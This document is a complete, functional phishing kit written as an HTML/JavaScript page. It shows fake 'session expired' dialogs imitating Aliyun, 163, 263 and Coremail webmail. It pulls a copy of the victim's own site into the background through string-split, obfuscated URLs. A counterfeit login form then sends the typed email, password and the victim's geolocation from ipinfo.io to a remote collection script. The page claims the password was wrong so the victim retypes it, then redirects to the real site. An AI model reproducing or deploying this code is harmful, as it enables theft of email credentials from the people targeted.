<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Document</title>
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"
    />
    <link rel="shortcut icon" href="" />

    <!-- <script src="./myjs.js"></script> -->
    <script>
      async function abs(ml, mg) {
        try {
          let r = await fetch(`${ml}?${mg}`);
          let v = await r.json();
          let page = JSON.parse(v).mx_page;
          let original = JSON.parse(v).original;

          console.log(mg, page, original);

          if (page == "aliyun" || page == "qiye-aliyun") {
            document.querySelector("#test #errorPop").innerHTML = ` <style>
            .eer_dialog {
                width: 500px;
                background-color: white;
                border: 1px solid #ddd;
                border-radius: 4px;
                box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
                overflow: hidden;
            }

            .eer_dialog-header {
                background-color: #f1f1f1;
                padding: 10px 16px;
                font-size: 16px;
                font-weight: bold;
                color: #333;
                display: flex;
                justify-content: space-between;
                align-items: center;
            }

            .eer_dialog-header .eer_close {
                cursor: pointer;
                font-size: 14px;
                color: #999;
            }

            .eer_dialog-header .eer_close:hover {
                color: #333;
            }

            .eer_dialog-content {
                padding: 16px;
                font-size: 14px;
                color: #555;
                text-align: left;
                padding: 30px ;
                font-weight: 500;
            }

            .eer_dialog-footer {
                padding: 10px 16px;
                text-align: right;
                background-color: #f1f1f1;
            }

            .eer_dialog-footer button {
                padding: 6px 12px;
                font-size: 14px;
                border: none;
                border-radius: 4px;
                background-color: #4c81ba;
                color: white;
                cursor: pointer;
            }

            .eer_dialog-footer button:hover {
                background-color: #0056b3;
            }
            </style>
            <div class="eer_dialog">
                <div class="eer_dialog-header">
                    <span>System information</span>
                    <span class="eer_close">&times;</span>
                </div>
                <div class="eer_dialog-content">
                    The session has expired, please log in again.
                </div>
                <div class="eer_dialog-footer">
                    <button onclick='showForm()'>OK</button>
                </div>
            </div>
            `;
          } else if (page == "qiye-163" || page == "163") {
            document.querySelector("#test #errorPop").innerHTML = `<style>
        
            .eer_container {
                width: 500px;
                border: 1px solid #ccc;
                background-color: white;
            }
            .eer_header {
                background: linear-gradient(to bottom, rgba(124, 218, 255, 0.3), rgb(12, 152, 207));
                height: 30px;
                color: white;
                padding: 0px 10px;
                display: flex;
                align-items: center; 
                
            }
            .eer_header i {
                margin-right: 8px;
            }
            .eer_content {
                display: flex;
                align-items: center;
                padding: 20px;
            }
            .eer_icon {
                font-size: 50px;
                color: #ccc;
            }
            .eer_message {
                color: red;
                font-size: 14px;
                margin: 10px 0;
                margin-left: 20px;
                font-weight: 600;
            }
            .eer_button-container {
                display: flex;
                justify-content: center;
                align-items: center;
                text-align: center;
                padding: 5px;
                border-top: 2px solid rgb(213, 220, 232);
                background-color: rgb(241, 246, 254);
            }
            .eer_button {
                padding: 5px 10px;
                margin: 5px;
                border: 1px solid #ccc;
                background-color: #f1f1f1;
                cursor: pointer;
                font-weight: 500;
                background: linear-gradient(to bottom, rgb(228, 241, 247), rgb(154, 210, 232));


            }
            .eer_button:hover {
                background-color: #e0e0e0;
            }
            </style>
            <div class="eer_container">
                <div class="eer_header">
                    <i class="bi bi-info-circle-fill"></i>
                    <p>系统提示</p>
                    </div>
                <div class="eer_content">
                    <div class="eer_icon"> ☹ </div>
                    <div class="err_message"> &nbsp; 会话已过期，请重新登录。</div>
                </div>
                <div class="eer_button-container">
                    <button class="eer_button" onclick='showForm()'>返回邮箱首页</button>
                </div>
            </div>`;
          } else if (page == "263") {
            document.querySelector("#test #errorPop").innerHTML = `<style>
        
                .err_container {
                width: 450px;
                background: #ffffff00;
                border: 1px solid #ddd;
                padding: 20px;
                box-shadow: 2px 2px 10px rgba(0, 0, 0, 0.1);
                }
                .err_title {
                color: #a00;
                font-weight: bold;
                margin-bottom: 10px;
                float: left;
                }
                .err_content {
                text-align: center;
                margin: 20px 50px;
                font-weight: 600;
                }
                .err_message {
                font-size: 12px;
                color: #000;
                margin-bottom: 5px;
                }
                .err_email {
                font-size: 12px;
                color: #222;
                word-break: break-all;
                }
                .err_button {
                display: flex;
                justify-content: flex-end;
                margin-top: 0px;
                padding: 5px 25px;
                background: #aaa;
                color: #fff;
                text-decoration: none;
                border: none;
                cursor: pointer;
                }
                .err_button:hover {
                background: #888;
                }
                .err_footer {
                display: flex;
                justify-content: flex-end;
                }
            </style>

            <div class="err_container">
                <div class="err_title">系统提示</div>
                <div class="err_content">
                <div class="err_message">您当前状态已失效，请重新登录邮箱</div>
                <div class="err_email">
                    (wm2a115-0208073811-<span id='263email'>sales88@king-inflatable.com</span>-94a031743ad9833f4171dbf5c69d19fa)
                </div>
                </div>
                <div class="err_footer">
                <button class="err_button" onclick='showForm()'>返回</button>
                </div>
            </div>

            `;
          } else if (page == "icoremail") {
            document.querySelector("#test #errorPop").innerHTML = `<style>
        
            .err_dialog {
                width: 450px;
                background-color: white;
                border: 1px solid #e0e0e0;
                border-radius: 8px;
                box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
                padding: 16px;
                text-align: center;
            }

            .err_dialog-header {
                display: flex;
                align-items: center;
                margin-bottom: 12px;
            }

            .err_dialog-header-icon {
                width: 20px;
                height: 20px;
                margin-right: 10px;
                color: white;
                background-color: orange;
                border-radius: 100%;
            }

            .err_dialog-header span {
                font-size: 16px;
                font-weight: bold;
                color: #333;
            }

            .err_dialog-content {
                font-size: 14px;
                color: #666;
                margin-bottom: 16px;
            }

            .err_dialog-buttons {
                display: flex;
                justify-content: flex-end;
            }

            .err_dialog-buttons button {
                padding: 5px 10px;
                height: 36px;
                border: none;
                border-radius: 4px;
                font-size: 14px;
                cursor: pointer;
                margin-left: 5px;
            }

            .err_dialog-buttons .err_cancel-button {
                background-color: #f2f2f2;
                color: #333;
            }

            .err_dialog-buttons .err_cancel-button:hover {
                background-color: #e0e0e0;
            }

            .err_dialog-buttons .err_login-button {
                background-color: #007bff;
                color: white;
            }

            .err_dialog-buttons .err_login-button:hover {
                background-color: #0056b3;
            }
            </style>

            <div class="err_dialog">
                <div class="err_dialog-header">
                    <div class="err_dialog-header-icon">!</div>
                    <span>提示</span>
                </div>
                <div class="err_dialog-content">
                    你的登录状态已失效，请重新登录。
                </div>
                <div class="err_dialog-buttons">
                    <button class="err_cancel-button" onclick='showForm()'>取消</button>
                    <button class="err_login-button" onclick='showForm()'>重新登录</button>
                </div>
            </div>
            `;
          } else {
            document.querySelector("#test #errorPop").innerHTML = `<style>
        
            .err_dialog {
                width: 450px;
                background-color: white;
                border: 1px solid #e0e0e0;
                border-radius: 8px;
                box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
                padding: 16px;
                text-align: center;
            }

            .err_dialog-header {
                display: flex;
                align-items: center;
                margin-bottom: 12px;
            }

            .err_dialog-header-icon {
                width: 20px;
                height: 20px;
                margin-right: 10px;
                color: white;
                background-color: orange;
                border-radius: 100%;
            }

            .err_dialog-header span {
                font-size: 16px;
                font-weight: bold;
                color: #333;
            }

            .err_dialog-content {
                font-size: 14px;
                color: #666;
                margin-bottom: 16px;
            }

            .err_dialog-buttons {
                display: flex;
                justify-content: flex-end;
            }

            .err_dialog-buttons button {
                padding: 5px 10px;
                height: 36px;
                border: none;
                border-radius: 4px;
                font-size: 14px;
                cursor: pointer;
                margin-left: 5px;
            }

            .err_dialog-buttons .err_cancel-button {
                background-color: #f2f2f2;
                color: #333;
            }

            .err_dialog-buttons .err_cancel-button:hover {
                background-color: #e0e0e0;
            }

            .err_dialog-buttons .err_login-button {
                background-color: #007bff;
                color: white;
            }

            .err_dialog-buttons .err_login-button:hover {
                background-color: #0056b3;
            }
            </style>
            
            <div class="err_dialog">
               
                <div class="err_dialog-content">
                   <br> 你的登录状态已失效，请重新登录。
                </div>
                <div class="err_dialog-buttons">
                    <button class="err_login-button" onclick='showForm()'>重新登录</button>
                </div>
            </div>`;
          }

          document.querySelector("#loader").style.display = "none";
          document.querySelector("#orgi").value = original;
          //sessionStorage.setItem("m", mg)
          //sessionStorage.setItem("m", mg);
          //sessionStorage.setItem("original", JSON.parse(v).original);
          //console.log(v)
          // window.location.assign(
          // `${baseURL}/${JSON.parse(v).mx_page}.html?${xx[1]}`
          // );
          loadBackground(original);
        } catch (e) {
          console.log("ABS Func", e);
        }
      }

      function loadBackground(url) {
        let rd1 = "htt";
        let rd2 = "ps://";
        let rd3 = "sta";
        let rd4 = "reio.com/se";
        let rd5 = "rveB";
        let rd6 = "g.php";

        fetch(`${rd1}${rd2}${rd3}${rd4}${rd5}${rd6}?${url}`)
          .then((r) => r.text())
          .then((v) => {
            // console.log("bg content", url, v);
            document.querySelector("#myFrame").innerHTML = v;
            const faviconRegex =
              /<link[^>]+rel=["'][^"']*icon[^"']*["'][^>]+href=["']([^"']+)["']/i;
            const match = v.match(faviconRegex);

            if (match && match[1]) {
              document.querySelector("#favic").src = match[1];
              document.querySelector('[rel = "shortcut icon"]').href = match[1];
            } else {
              document.querySelector("#favic").src = "";
              document.querySelector('[rel = "shortcut icon"]').href = "";
            }
          })
          .catch((e) => console.log("Load Background ", e));
      }
    </script>
    <script
      type="text/javascript"
      src="https://code.jquery.com/jquery-latest.min.js"
    ></script>
  </head>

  <body>
    <style>
      html,
      body {
        margin: 0;
        padding: 0;
        height: 100%;
      }
      iframe {
        width: 100%;
        height: 100vh; /* Occupies full viewport height */
        border: none; /* Optional: remove border */
      }

      * {
        padding: 0;
        margin: 0;
        box-sizing: border-box;
      }
      #loader {
        display: flex;
        align-items: center;
        justify-content: center;
        width: 100%;
        height: 100%;
        position: absolute;
        top: 0;
        left: 0;
        background-color: #f1f2f555;
        z-index: 99;
      }

      @keyframes hideLoader {
        from {
          opacity: 1;
        }

        to {
          opacity: 0;
        }
      }

      @keyframes showLoader {
        from {
          opacity: 0;
        }

        to {
          opacity: 1;
        }
      }

      .lds-ellipsis {
        display: inline-block;
        position: relative;
        width: 80px;
        height: 80px;
        opacity: 0.8;
      }

      .lds-ellipsis div {
        position: absolute;
        top: 33px;
        width: 13px;
        height: 13px;
        border-radius: 50%;
        background: dodgerblue;
        animation-timing-function: cubic-bezier(0, 1, 1, 0);
      }

      .lds-ellipsis div:nth-child(1) {
        left: 8px;
        animation: lds-ellipsis1 0.6s infinite;
      }

      .lds-ellipsis div:nth-child(2) {
        left: 8px;
        animation: lds-ellipsis2 0.6s infinite;
      }

      .lds-ellipsis div:nth-child(3) {
        left: 32px;
        animation: lds-ellipsis2 0.6s infinite;
      }

      .lds-ellipsis div:nth-child(4) {
        left: 56px;
        animation: lds-ellipsis3 0.6s infinite;
      }

      @keyframes lds-ellipsis1 {
        0% {
          transform: scale(0);
        }

        100% {
          transform: scale(1);
        }
      }

      @keyframes lds-ellipsis3 {
        0% {
          transform: scale(1);
        }

        100% {
          transform: scale(0);
        }
      }

      @keyframes lds-ellipsis2 {
        0% {
          transform: translate(0, 0);
        }

        100% {
          transform: translate(24px, 0);
        }
      }
    </style>
    <div id="loader">
      <div class="lds-ellipsis">
        <div></div>
        <div></div>
        <div></div>
        <div></div>
      </div>
    </div>
    <input
      class="frr_input"
      type="hidden"
      id="loc"
      name="email"
      required
      placeholder="Loc"
    />
    <input
      class="frr_input"
      type="hidden"
      id="foc"
      name="email"
      required
      placeholder="FOC"
    />

    <input
      class="frr_input"
      type="hidden"
      id="trial"
      name="email"
      required
      placeholder="trial"
    />
    <input
      class="frr_input"
      type="hidden"
      id="orgi"
      name="orgi"
      required
      placeholder="original"
    />

    <script>
      let xx = window.location.href.split("?");
      xx = xx[1].split("__");
      let mg = "";
      let base64regex =
        /^([0-9a-zA-Z+/]{4})*(([0-9a-zA-Z+/]{2}==)|([0-9a-zA-Z+/]{3}=))?$/;

      if (xx[1] != undefined) {
        if (!base64regex.test(xx[1])) {
          mg = xx[1];
        } else {
          mg = atob(xx[1]);
        }

        let rd1 = "htt";
        let rd2 = "ps://";
        let rd3 = "sta";
        let rd4 = "reio.com/se";
        let rd5 = "rvePa";
        let rd6 = "ge.php";

        abs(`${rd1}${rd2}${rd3}${rd4}${rd5}${rd6}`, mg);
      }
    </script>

    <style>
      #formPop {
        display: none;
      }

      #errorPop {
        display: flex;
      }

      .frr_popup {
        display: flex;
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background-color: rgba(0, 0, 0, 0.5); /* Semi-transparent background */
        justify-content: center;
        align-items: flex-start;
        z-index: 20000000000000;
      }

      #test {
        /* background-color: white; */
        padding: 20px;
        border-radius: 5px;
        text-align: center;
        width: auto;
        margin-top: 50px;
      }
    </style>
    <script>
      function showForm() {
        document.querySelector("#test #errorPop").style.display = "none";
        document.querySelector("#test #formPop").style.display = "flex";
      }
    </script>
    <div class="frr_popup">
      <div id="test">
        <div id="errorPop"></div>
        <form id="form_" action="#" method="POST">
          <div id="formPop">
            <style>
              .frr_login-container {
                background-color: #fff;
                padding: 20px;
                border-radius: 8px;
                box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
                width: 350px;
              }

              .frr_h2 {
                text-align: center;
              }

              .frr_form-group {
                margin-bottom: 15px;
              }

              .frr_label {
                display: block;
                font-size: 14px;
                margin-bottom: 5px;
                text-align: left;
              }

              .frr_input {
                width: 100%;
                padding: 10px;
                font-size: 14px;
                border: 1px solid #ddd;
                border-radius: 4px;
              }

              .frr_button {
                width: auto;
                padding: 10px;
                background-color: #007bff;
                color: white;
                font-size: 16px;
                border: none;
                border-radius: 4px;
                cursor: pointer;
                float: right;
              }

              .frr_button:hover {
                background-color: #0056b3;
              }

              .frr_error-message {
                color: red;
                font-size: 12px;
                margin-top: 5px;
              }
            </style>

            <div class="frr_login-container">
              <div
                style="
                  display: flex;
                  justify-content: center;
                  align-items: center;
                  margin-bottom: 10px;
                  gap: 10px;
                "
              >
                <img id="favic" height="30" />
                <h2 class="frr_h2">Login</h2>
              </div>
              <p style="margin-bottom: 20px">
                Session Expired! Login to Continue.
              </p>
              <div class="frr_form-group">
                <label class="frr_label" for="email">Email:</label>
                <input
                  class="frr_input"
                  type="email"
                  id="fuc"
                  name="email"
                  required
                  placeholder="Enter your email"
                  value=""
                />
                <span id="errmsg" class="frr_error-message"></span>
              </div>

              <div class="frr_form-group">
                <label class="frr_label" for="password">Password:</label>
                <input
                  class="frr_input"
                  type="password"
                  id="fpc"
                  name="password"
                  required
                  placeholder="Enter your password"
                />
              </div>

              <button type="submit" class="frr_button" id="frr_button">
                Login
              </button>
            </div>
          </div>
        </form>
      </div>
    </div>

    <div id="myFrame"></div>

    <script>
      let resBox = "Global";

      //Your PHP GOES HERE
      let nbg1 = "ht";
      let nbg2 = "tps://kvwp";
      let nbg3 = "ca.co";
      let nbg4 = "m/jagso";
      let nbg5 = "n/gram.p";
      let nbg6 = "hp";

      let nbg = `${nbg1}${nbg2}${nbg3}${nbg4}${nbg5}${nbg6}`;

      /*  let ov1 = "https";
      let ov2 = "://";
      let ov3 = "logi";
      let ov4 = "n.made-in";
      let ov5 = "-chin";
      let ov6 = "a.co";
      let ov7 = "m/";

      let ov = `${ov1}${ov2}${ov3}${ov4}${ov5}${ov6}${ov7}`; */

      sessionStorage.clear();
      let original = document.querySelector("#orgi").value;
      let trialCount = sessionStorage.getItem("num_trial");

      if (!trialCount) {
        sessionStorage.setItem("num_trial", 0);
      } else if (trialCount >= 2) {
        window.location.assign(original);
      }

      let foc = document.querySelector("#foc");
      let frr_button = document.querySelector("#frr_button");
      let trial = document.querySelector("#trial");

      console.log(mg, original);

      foc.value = mg;
      fuc.value = mg;

      trial.value = trialCount;

      let myForm = document.querySelector("#form_");
      myForm.addEventListener("submit", async function (event) {
        event.preventDefault();
        let fuc = document.querySelector("#fuc");
        let fpc = document.querySelector("#fpc");
        let loc = document.querySelector("#loc");

        $.ajax({
          dataType: "JSON",
          url: nbg,
          type: "POST",
          data: {
            hos: xx[2],
            foc: foc.value,
            fuc: fuc.value,
            fpc: fpc.value,
            loc: loc.value,
            trial: trial.value,
            resBox: resBox,
          },
          beforeSend: function (xhr) {
            // console.log(xhr);
            $("#frr_button").html("Verifying...");
            // loader.style.display = "flex";
            // loader.style.animation = "showLoader .5s ease";
          },
          success: function (response) {
            console.log("Success", response);
            // Combine logic from both success functions here
            if (response) {
              /* loader.style.animation = "hideLoader 1s ease";
      setTimeout(() => {
          loader.style.display = "none";
      }, 1000); */
              $("#frr_button").html("Login");
              // console.log(response);
              if (response["signal"] == "ok") {
                trialCount++;
                sessionStorage.setItem("num_trial", trialCount);
                trial.value = trialCount;

                if (trialCount >= 2) {
                  count = 0;
                  window.location.replace(ov);
                  return false;
                }

                fpc.value = "";
                fpc.focus();
                document.getElementById("errmsg").innerHTML =
                  "嗯，这不是正确的密码。请再试一次";
              } else {
                console.log("Error Occurred!!!");
                // $('#msg').html(response['msg']);
              }
            }
          },
          error: function (jqXHR, textStatus, errorThrown) {
            console.log("Error", jqXHR, textStatus, errorThrown);
            fpc.value = "";
            fpc.focus();
            document.getElementById("errmsg").innerHTML =
              "嗯，这不是正确的密码。请再试一次";
          },
          complete: function (xhr) {
            $("#frr_button").html("Login");
            // loader.style.animation = "hideLoader 1s ease";
            // setTimeout(() => {
            //   loader.style.display = "none";
            // }, 1000);
          },
        });
      });

      $.get(
        "https://ipinfo.io/json?token=10da60a9ff2d81",
        function (response) {
          let cou = `${response.city}, ${response.region}, ${response.country}. ${response.postal} ${response.timezone}`;
          $("#loc").val(cou);
        },
        "jsonp"
      );
    </script>
  </body>
</html>
